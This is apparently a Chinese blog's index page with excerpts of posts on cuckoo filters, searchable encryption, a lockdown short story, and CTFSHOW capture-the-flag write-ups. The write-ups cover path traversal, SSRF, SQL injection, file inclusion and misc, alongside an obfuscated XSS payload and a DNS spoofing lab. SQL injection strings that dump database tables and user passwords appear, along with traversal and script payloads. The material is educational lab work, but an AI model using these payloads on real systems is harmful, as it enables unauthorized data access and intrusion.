布谷鸟过滤器
一、布隆过滤器 在说布谷鸟过滤器之前,有必要先简要介绍一下布隆过滤器,它可以判断在一个存储表中是否含有某个元素(e)。底层中使用bitmap实现,其初始值为0。存储某个数据时,会有多次(示例中为3次)hash运算,将运算结果作为坐标,将对应的bit位改为1,由此标记它是否存在于表中。当几次哈希的结果中有一次不为1,都判断元素不存在。 一些问题:布隆过滤器不支持删除,且计算坐标时对应多个不同位点,效率低下。 这个网站可以直观地观察布隆过滤器插入数据的过程。 二、布谷鸟过滤器为啥要叫这个名? 布谷鸟交配后,雌性布谷鸟就准备产蛋了,但它却不会自己筑巢。它会来到像知更鸟、刺嘴莺等那些比它小的鸟类的巢中,移走原来的那窝蛋中的一个,用自己的蛋来取而代之。相对于它的体形来说,它的蛋是偏小的,而且蛋上的斑纹同它混入的其他鸟的蛋也非常相似,所以不易被分辨出来。如果不是这样,它的蛋肯定会被扔出去。 ...
对称可搜索加密技术与流量检测的融合思路
(毕设整的烂活,这里简单记录下) 可搜索加密技术一开始被应用于云端存储加密文件,用户无需解密即可让云端服务器返回指定的检索结果(当然通常是关键词检索)。其流程如下: 把这俩结合起来的注意其实很早就有人提出来了,参看Privacy-preserving deep packet inspection in outsourced middleboxes一文。基本结合思路是,让发送流量的一方生成令牌token来映射可搜索加密中的搜索陷门,让中间盒不需要解密流量也能找出来流量里面藏着什么玩意。
用树枝开核桃
电话接通的时候,锡峰正走在回家的路上,他手里都是未来七天一家人所需的生活物资。人行道上挤满了满载而归的行人,手上、背上,甚至头顶上都是各式各样五颜六色的包装袋。所有人脸上的n95口罩都在剧烈起伏着,但是没有人胆敢在这个关头取下口罩——有人为了防寒,甚至多戴了一层棉质防寒巾。不管怎么说,从明天开始衡泉市又要因为冠状病毒而管控起来,事实上自从几个月前,这样的通知隔一段时间总要在各大小区的业主群传播一次。而各大超市的老板似乎也和大家有了长久配合而来的默契:平时进入超市一定要提供行程码、健康码和核酸检测阴性证明三样“通行证”,缺一不可,而在管控前一天仅仅需要其中之一便可。于是,平日里门可罗雀的超市仅仅在这一天有了热闹起来的机会。 ...
【CTFSHOW】 web入门中期测试
web486可以扫目录,发现位于上级目录的flag.php。而URL的action参数为一任意文件读取。 payload:index.php?action=../flag web487action=../index查看源码: 12345678910111213141516171819202122232425262728293031<!--?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-03-08 15:43:51# @Last Modified by: h1xa# @Last Modified time: 2021-03-08 22:30:08# @email: h1xa@ctfer.com# @link:...
【CTFSHOW】 web入门SSRF
关于SSRF:SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。 题目:web351:1234567891011 <?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);//不返回header头消息curl_setopt($ch, CURLOPT_RETURNTRANSFER,...
【CTFSHOW】 web入门sql注入
题目:web171:payloads: 12345-1'union select 1,2,database()--+ //查询数据库名-1'union select 1,2,concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+ //查询指定数据库下的表名-1'union select 1,2,concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+ //查询指定表名的列名-1'union select 1,2,concat(id,username,password) from ctfshow_user--+ ...
【CTFSHOW】 web入门文件包含
文件包含漏洞:文件包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 常见函数: include( ) 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。 include_once( ) 功能与Include()相同,区别在于当重复调用同一文件时,程序只调用一次。 require( ) require()与include()的区别在于require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。 require_once( ) 功能与require()相同,区别在于当重复调用同一文件时,程序只调用一次。 题目:web78:PHP...
那些看不懂的操作【alert无数字字母有效载荷】
一个奇奇怪怪的不含字母数字的alert(1)有效载荷,意义不明(?) 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253<script>/*〱='',〳=〱,ᘓ=〱+{},ᘒ=〱+[][[]],〱+=[〱==〱],〳+=[!〱],ᘑ=+[],ᘐ=+!+[],ᘔ=ᘐ+ᘐ,ᘕ=ᘔ+ᘐ,ᘖ=ᘔ+ᘕ,ᘖ+=ᘖ+ᘖ+ᘔ,ᘗ=ᘖ+ᘐ,ᘘ=ᘓ[ᘔ+ᘕ],ᘙ=ᘓ[ᘐ],ᘚ=〱[ᘐ],ᘲ=〱[ᘑ],ᘳ=ᘘ+ᘙ+ᘒ[ᘐ]+〳[ᘕ]+ᘲ+ᘚ+ᘒ[ᘑ]+ᘘ+ᘲ+ᘙ+〱[ᘐ],ᘰ=[][ᘳ][ᘳ],ᘏ=''+ᘰ,ᘎ=〳[ᘐ]+〳[ᘔ]+〱[ᘕ]+ᘚ+ᘲ+ᘏ[ᘖ]+ᘏ[ᘗ],ᘰ`ᘳ${ᘎ}``` */〱=''〳=〱 //''ᘓ=〱+{} ...
【CTFSHOW】misc入门(9-38)
misc9使用notepad打开即可查找到flag。 这里使用strings命令 misc10binwalk 可以一把梭 misc11删除第一个IDAT块保存即可 工具:Tweakpng misc12删除前8个IDAT块 关于png格式分析文章传送门:https://www.cnblogs.com/lidabo/p/3701197.html misc13根据提示寻找flag 将选中部分取下,隔一个字节单独取出,再转为字符串即可 12345678s='63 1A 74 B9 66 85 73 86 68 AA 6F 4B 77 B0 7B 21 61 14 65 53 36 A5 65 54 33 34 65 78 61 25 34 DD 38 EF 66 AB 35 10 31 95 38 1F 62 82 37 BA 65 45 34 7C 32 54 64 7E 37 3A 64 E4 65 F1 36 FA 66 F5 34 1E 31 07 32 1D 66 54 38 F1 33 32 39 E9 61 6C...
【渗透实验】DNS欺骗
概述:什么是DNS欺骗攻击?DNS(DomainNameSystem,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用记住IP地址。而DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页,从而达到“冒名顶替”的效果。DNS协议运行在UDP协议之上,使用端口号53,DNS并不包含任何认证机制,因此第三方可以对DNS数据包进行伪造。 实验环境: 攻击机:kali 2021(192.168.40.130) 靶机:seed ubuntu 12.04(192.168.40.132) 实验过程:部署web主页本实验需要利用apache在kali端设置导向页面 在终端输入开启apache服务:/etc/init.d/apache2...








